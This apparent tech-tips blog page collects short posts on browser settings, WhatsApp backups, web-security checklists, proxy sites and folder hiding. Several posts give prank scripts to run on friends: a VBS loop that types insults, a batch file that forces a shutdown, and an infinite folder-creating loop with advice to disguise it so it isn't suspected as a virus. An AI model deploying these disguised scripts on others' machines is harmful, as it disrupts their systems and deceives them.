Posts

Showing posts from 2016

Rest API webservice Testing

Image
https://chrome.google.com/webstore/detail/dhc-rest-client/aejoelaoggembcahagimdiliamlcdmfm/related use this addon for api webservice testing addon and then add your details Thanks

Google Game

Bored ! Go To Google Images And Search Atari Breakout

Chrome cookies folder in Windows 7

In Google Chrome go to: Settings > Show Advanced Settings > Privacy > Content Settings > Cookies > All Cookies and Site Data Or simply: chrome://settings/cookies

Delete backup whatsapp messages in google drive

Image
Using a computer, go to drive.google.com. In the top right, click Settings > Settings. 3. On the left, click Manage Apps. 4.  Find "WhatsApp" in the list. Note: If your backup is large, WhatsApp might take a few minutes to display. 5. click options > Delete Hidden App data

Tips to Secure your CodeIgniter Application

Keep CodeIgniter up to date Server side validation/form validation Allowed URL Characters SQL injection Password encoding XSS (Cross site scripting) Error messages Output filtering Sessions Data Protection / Read only File uploads SSL

Test Scenarios for Security Testing

Verify the web page which contains important data like password, credit card numbers, secret answers for security question etc should be submitted via HTTPS (SSL). Verify the important information like password, credit card numbers etc should display in encrypted format. Verify password rules are implemented on all authentication pages like Registration, forgot password, change password. Verify if the password is changed the user should not be able to login with the old password. Verify the error messages should not display any important information. Verify if the user is logged out from the system or user session was expired, the user should not be able to navigate the site. Verify to access the secured and non secured web pages directly without login. Verify the “View Source code” option is disabled and should not be visible to the user. Verify the user account gets locked out if the user is entering the wrong password several times. Verify the cookies should not store pas...

LIST OF BEST FREE SMS SITES

Image
www.160by2.com www.way2sms.com www.ultoo.com www.freephonesms.com   www.funsms.net www.sendsmsnow.com www.smsgupshup.com www.indyarocks.com www.textmefree.com www.sms2friends.com www.indiansms.net www.textmefree.com www.send-sms-now.com www.freesmsfun.com

TYPE “YOU ARE A FOOL” CONTINUOUSLY:-

Open Notepad. Paste the following code in the notepad file: Set wshShell = wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “You are a fool.” loop Save the file with any name but with .vbs extension and close it. Ope the file and see how it makes you type!

CONVEY YOUR FRIEND A LIL’ MESSAGE AND SHUT DOWN HIS / HER COMPUTER

Type in Notepad :- @echo off msg * I don’t like you shutdown -c “Error! You are stupid!” -s Save it as “Anyname.BAT”. Like notepadvirus.bat

Top 100 Free Proxy Server List

FilterByPass –   https://www.filterbypass.me/ Unlock My Web –  http://www.unblockmyweb.com/ Proxy Site –   https://www.proxysite.com/ Hide My Ass –  https://www.hidemyass.com/ Proxify –  https://proxify.com/  (3 days trial) Free YouTube Proxy –  http://www.youtubeunblockproxy.com/ Proxy –  http://proxy.org/ England Proxy –  https://www.englandproxy.co.uk/ Unblocker –  https://www.unblocker.us/ Fast USA Proxy –  http://fastusaproxy.com/   New IP Now –  http://newipnow.com/ Anonymouse –   http://anonymouse.org/anonwww.html Hidden Digital Info –  http://hiddendigital.info/ Anony Mizer –  https://www.anonymizer.com/  (14 days free trial) K Proxy –   http://www.kproxy.com/ Don’t Filter –  http://dontfilter.us/ Working Proxy –  https://www.workingproxy.net/ Proxy 2014 –  http://www.proxy2014.net/ Prox Me Call Me Names –  http://www.proxmecallmenames.com/ Change IP...

How to hide or unhide folders and files

The main advantage of hiding using the attrib command is that when we click on the show hidden files option in Windows then the file or folder isn’t shown. For hiding files and folders we need to use a procedure. In the following scenario I first created a new folder to show how to hide or unhide a folder. To hide: Step 1:  Go to Start Menu > All Programs >Accessories > Command prompt. or simply press Windows key+R. Step 2:  Now in command prompt type />  attrib +s +h <drive path>:\<folder name> ex: /> attrib +s +h d:\xyz Thats it now your folder in D drive will not shown to you even you are cheked in show hidden file will not visible. To Unhide: TO unhide a folder you just need to chage the sign of ‘+’ into ‘-‘ to visible your folder Step 3: /> attrib -s -h d:\xyz thats it now your file will visible to you. ~~~~~~~

How to create more than 3,000 folders under a minute

1) Open your notepad and type the following code. @echo off :top md %random% 2) Save it as 1000.bat @echo off makes your screen appear blank but it is actually making hundreds of folders. md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos) goto top – return the command to :top, causes an infinite loop. NOTE: The folders will get created in the directory where you saved the ”1000.bat” file. The file might look suspicious to your friends. So if you are looking to fool your friends, then change the file name and also the icon so that he doesn’t suspect the file to be a virus.